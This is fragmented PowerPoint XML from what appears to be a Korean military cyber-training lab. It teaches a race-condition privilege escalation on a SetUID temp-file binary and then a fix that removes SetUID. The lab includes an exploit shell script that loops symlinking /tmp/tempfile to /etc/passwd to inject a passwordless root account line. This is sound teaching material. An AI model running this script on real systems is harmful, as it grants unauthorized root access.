            <a:ext cx="4791076" cy="264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36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065DD0D5-E074-41EA-BCE1-13FD883480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1" t="13394" r="804" b="69595"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="4093465"/>
            <a:ext cx="4905375" cy="5476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141">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92AFE8B1-4B5F-452F-B39E-14DBCF1286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7" t="13987" r="271" b="75784"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="5147503"/>
            <a:ext cx="4830128" cy="323657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E8CA100-2841-49EB-8217-4CDEDF3A1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427977"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6289547" y="475614"/>
          <a:ext cx="5390959" cy="3661855"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5390959">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3722723306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433575"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="303657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ASLR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활성화하면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변수의 주소가 실행할 때마다 변경되므로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변경 없이도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포맷 스트링 공격의 방어가 일부 가능하다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공격자는 스크립트 등을 사용하여 성공할 때까지 반복함으로써 공격을 성공시킬 수도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156445"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69633" name="_x617883232">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39EC40B8-29EC-4CEF-8198-5077B2CA2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691" y="1769617"/>
            <a:ext cx="4656138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437817-B378-4F35-A9EA-71E314E5D783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4427156"/>
            <a:ext cx="5616792" cy="206184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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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check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550007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/Training/Unit/Sys/12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>권한상승 공격 및 방어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Race Condition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이용하여 권한 상승을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시도하시오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이를 통해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/passwd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파일에 다음을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삽입하시오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insertid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::0:0:root/root:/bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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test / test123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Race Condition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권한 상승 공격을 수행할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Race Condition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권한 상승 공격에 대응할 수 있다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(CentOS 6)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027875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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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cd /sec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ls –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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3) /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 테스트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./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> Test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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 인자로 넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 추가됨을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4) /sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 작성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vim /sec/exploit.sh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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5976D8-17E7-43BF-8A40-C0278FA2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" y="1100666"/>
            <a:ext cx="5135880" cy="5410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145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4EE6A3-1744-4DB6-B5B7-AB94CC2FE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80" y="2144606"/>
            <a:ext cx="5400040" cy="2990596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5DDACDB-0DED-4220-B383-66DCD44E5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268076"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500380" y="5200516"/>
          <a:ext cx="4968748" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4968748">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="82261486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설명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331991"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896"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"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작성된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/sec/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createTempFile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바이너리의 경우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tempfile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삭제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(remove), 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tempfile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생성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fopen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내용 추가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fprintf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수행한다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415954"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5E00B4-9767-417D-9C4B-7708EA208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440" y="1100666"/>
            <a:ext cx="4594860" cy="8077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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5479E1B6-BC9D-4A77-B2E9-E7F8136EB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100" y="2800520"/>
            <a:ext cx="4877816" cy="29568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176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5) /sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 권한 부여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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 755 /sec/exploit.sh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6) /sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 권한 상승을 통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 조작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/sec/exploit.sh </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B0495DD-15AA-42C8-99DA-D6EE22C9B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144664"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="482536" y="501301"/>
          <a:ext cx="4932807" cy="2443226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304647659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215407"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="18602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#! /bin/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old=`ls -l /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/passwd`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new=`ls -l /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/passwd`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while [ "$old" == "$new" ]; do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new=`ls -l /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/passwd`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/sec/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createTempFile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insertid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::0:0:root/root:/bin/bash &amp;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ls -s /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 /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tempfile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&amp;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done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echo "STOP... The passwd file has ben changed"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607326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7BED53-6299-4A40-B0C5-1A7D3EC54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578354"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="482536" y="3082831"/>
          <a:ext cx="5280914" cy="3105372"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5280914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3427049056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설명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400559"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1637506"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작성한 쉘 스크립트는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/sec/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createTempFile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바이너리를 실행하여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insertid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::0:0:root/root:/bin/bash”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문자열이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tempfile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파일에 저장되도록 하면서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tempfile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파일을 가리키는 소프트 링크가 되도록 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공격이 성공할 때까지 위를 반복한다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공격이 성공하면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파일의 크기 등이 변경되므로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ls -l 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명령의 출력 결과가 공격 이전과 달라진다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이를 이용하여 반복문을 벗어난다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673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#! /bin/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old=`ls -l /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/passwd`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new=`ls -l /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/passwd`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while [ "$old" == "$new" ]; do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new=`ls -l /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/passwd`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999769"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139E61FA-04B8-4C98-B644-4375D7665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340" y="894926"/>
            <a:ext cx="5013960" cy="7239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 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DB0B6D-C6B2-4A41-9210-653C8E5A0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340" y="2144754"/>
            <a:ext cx="4381500" cy="2788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33230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93C7773-1E01-4A87-A5D3-84602AC34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6634"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492315" y="531781"/>
          <a:ext cx="5004689" cy="1955546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5004689">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="284761806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364398"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="14538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공격이 성공하면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파일의 크기 등이 변경되므로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ls -l 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명령의 출력 결과가 공격 이전과 달라진다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이를 이용하여 반복문을 벗어난다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#! /bin/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old=`ls -l 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/passwd`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new=`ls -l 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/passwd`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while [ "$old" == "$new" ]; do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	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new=`ls -l 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/passwd`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11680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783ED4-2DC3-467F-ACA5-CF48357CC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589260"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286917" y="531781"/>
          <a:ext cx="5412768" cy="5800500"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5412768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="811078406"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5584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723" marR="14723" marT="4071" marB="40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425758"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4295491">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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쉘 스크립트에 의해 실행된 프로세스들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createTempFile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ln)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 병렬적으로 실행되는 것이 아니라 컨텍스트 스위칭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(context switching)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통해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번갈아가며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실행된다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그러므로 다음 그림과 같은 형태로 실행될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8140" marR="0" indent="-3581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14723" marR="14723" marT="4071" marB="40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152009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77828" name="_x618145072">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94716C9-27FA-45D6-8605-777D15AEE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623" y="1745774"/>
            <a:ext cx="5199062" cy="373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DA30C07-719D-408A-92F7-58BAD7D1A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481313"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492315" y="2788531"/>
          <a:ext cx="5412768" cy="3629183"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5412768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="811078406"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="20710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723" marR="14723" marT="4071" marB="40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425758"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="341117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파일 삭제 이전 소프트 링크 생성 시도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좌측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60000" marR="0" indent="-62611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- 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tempfile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root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계정의 소유이고 쉘 스크립트를 실행시킨 계정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(test)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쓰기 권한을 가지고 있지 않으므로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 링크 생성은 실패한다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 파일 삭제 및 파일 생성 사이 소프트 링크 생성 시도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우측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60000" marR="0" indent="-64135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tempfile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파일이 존재하지 않으므로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파일을 가리키는 소프트 링크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tempfile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생성된다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생성된 소프트 링크의 소유자는 쉘 스크립트를 실행시킨 계정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(test)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60000" marR="0" indent="-6375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- /sec/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createTempFile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바이너리는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fopen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tempfile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파일을 연다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파일은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파일을 가리키는 소프트 링크이므로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파일을 열게 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/sec/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createTempFile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바이너리에는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SetUID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부여되어 있으므로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root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 소유의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파일을 열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60000" marR="0" indent="-6362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- /sec/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createTempFile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바이너리의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fprintf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함수에 의해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/passwd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파일에 입력한 내용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insertid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::0:0:root/root:/bin/bash)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추가된다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723" marR="14723" marT="4071" marB="40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152009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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6EF7B63-D41B-41A6-BA16-FE86C4B459F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5905500" y="3764280"/>
            <a:ext cx="381417" cy="22098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557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사이버전 실습체계 구조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FBB328-93E9-4011-A7D7-7D3DC23EF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69" y="5971428"/>
            <a:ext cx="10630230" cy="420219"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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해군 사관생도들의 사이버 방호 능력 강화 및 실전적인 정보보호 교육 가능한 실습체계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en-US" altLang="ko-KR" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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VM,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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LMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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기반</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00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52F48F2-76E4-4392-B05B-84451494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741" y="1879088"/>
            <a:ext cx="6020951" cy="39039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화살표: 오른쪽 5">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC50651-2C6F-4788-A633-D599E0DF15A7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8555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4905" y="368998"/>
            <a:ext cx="5616792" cy="532314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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="_x1658365728">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BC1404B-71FF-41DC-B4B6-05D455009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13" y="943068"/>
            <a:ext cx="4622147" cy="332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1659855720">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7205F5AD-930B-4C48-A1F2-2B29EB99D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804" y="798418"/>
            <a:ext cx="5199062" cy="373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E27505-0E1B-4441-8F86-6B6670D21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9986"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286917" y="531781"/>
          <a:ext cx="5412768" cy="5068980"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5412768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="811078406"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5584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723" marR="14723" marT="4071" marB="40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425758"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="429549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⑤ 파일 닫기 이후 소프트 링크 생성 시도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-/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tempfile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root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계정의 소유이고 쉘 스크립트를 실행시킨 계정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(test)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쓰기 권한을 가지고 있지 않으므로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 링크 생성은 실패한다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626110" marR="0" indent="-62611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723" marR="14723" marT="4071" marB="40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152009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E31B4F6-AB67-476A-AAE5-CDE190608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261686"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="494134" y="572958"/>
          <a:ext cx="5412768" cy="5801071"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5412768">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="811078406"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5584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723" marR="14723" marT="4071" marB="40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425758"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="429549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③ 파일 생성 및 내용 쓰기 사이 소프트 링크 생성 시도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좌측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60000" marR="0" indent="-6248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- /sec/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createTempFile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바이너리에는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SetUID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부여되어 있으므로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fopen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의해 생성된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tempfile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root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 소유로 생성된다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60000" marR="0" indent="-62611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- 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tempfile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root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계정의 소유이고 쉘 스크립트를 실행시킨 계정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(test)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쓰기 권한을 가지고 있지 않으므로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 링크 생성은 실패한다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④ 파일 쓰기 및 파일 닫기 사이 소프트 링크 생성 시도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우측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360000" marR="0" indent="-62611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- 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tempfile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root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계정의 소유이고 쉘 스크립트를 실행시킨 계정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(test)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쓰기 권한을 가지고 있지 않으므로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 링크 생성은 실패한다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723" marR="14723" marT="4071" marB="407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1520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8290BCC-9756-4035-B1DE-175E2F95E67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5763544"/>
            <a:ext cx="5616792" cy="72545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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck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062957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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D80079-A11C-43EE-9972-D3F4784D0D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hlinkClick r:id="rId3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/Training/Unit/Sys/12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>권한상승 공격 및 방어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대응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시스템은 임시 파일을 간편하게 생성하기 위해   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/sec/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createTempFile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존재한다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하지만 해당 파일은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Race Condition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공격에 대해 취약점을 가지고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해당 취약점을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해소하시오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1)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setUID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권한 제거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chmod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u-s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파일명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Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C368EF7A-92D1-4A91-81D9-5D26FFC48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6DCF83-117F-4AE4-9EA9-30C83997164A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Race Condition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권한 상승 공격을 수행할 수 있다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Race Condition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권한 상승 공격에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CC42FDF-5869-4AED-8491-8D923280D19D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20B5FD6-6171-46A1-B1F9-896664A6F0F8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21" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C070845F-0B2E-4ECF-9421-4008703FC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7763094-5A83-47D7-820A-3B67422636AB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(CentOS 6)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802422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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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cd /sec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ls –l /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
